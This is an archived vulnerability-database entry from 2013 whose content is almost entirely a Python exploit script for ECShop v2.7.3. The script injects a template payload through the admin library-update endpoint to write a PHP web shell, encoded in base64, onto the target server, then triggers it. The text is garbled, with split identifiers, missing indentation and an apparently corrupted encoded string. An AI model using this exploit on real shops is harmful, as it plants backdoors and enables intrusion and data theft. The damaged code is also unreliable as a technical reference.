ECShop v2. 7. 3 RELEASE 2 0 1 2 1 1 0 6 EXP-vulnerability warning-the black bar safety net

2013-06-19T00:00:00
ID MYHACK58:62201339307
Type myhack58
Reporter MXi4oyu
Modified 2013-06-19T00:00:00

Description

-- coding:gbk -

import httplib2

from urllib import urlencode

def PostData(url):

url=url+'/admin/template. php? act=update_library'

Defined to submit the data

html='{if fputs(fopen(base64_decode(ZnVjay5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2Z1Y2tdktsgpz5mdwnr))}1 6 0 8 6{/if}'

data=dict(lib='recommend_best',html=html)

h = httplib2. Http('. cache')

response,content = h. request(url, 'POST', urlencode(data),

headers={'Content-Type': 'application/x-www-form-urlencoded'})

for item in response. items(): print(item)

print(content. decode('utf-8'))

def getHttp(urlstr):

urlstr=urlstr+'/index. php? act=cat_rec'

hlib=httplib2. Http('. cache')

response,content=hlib. request(urlstr)

print("\n server response:\n")

for r in response. items():

print r

print("\n output:\n")

print(content. decode("utf-8"))

if name=='main':

PostData('http://www.dome.com/')

getHttp('http://www.dome.com/')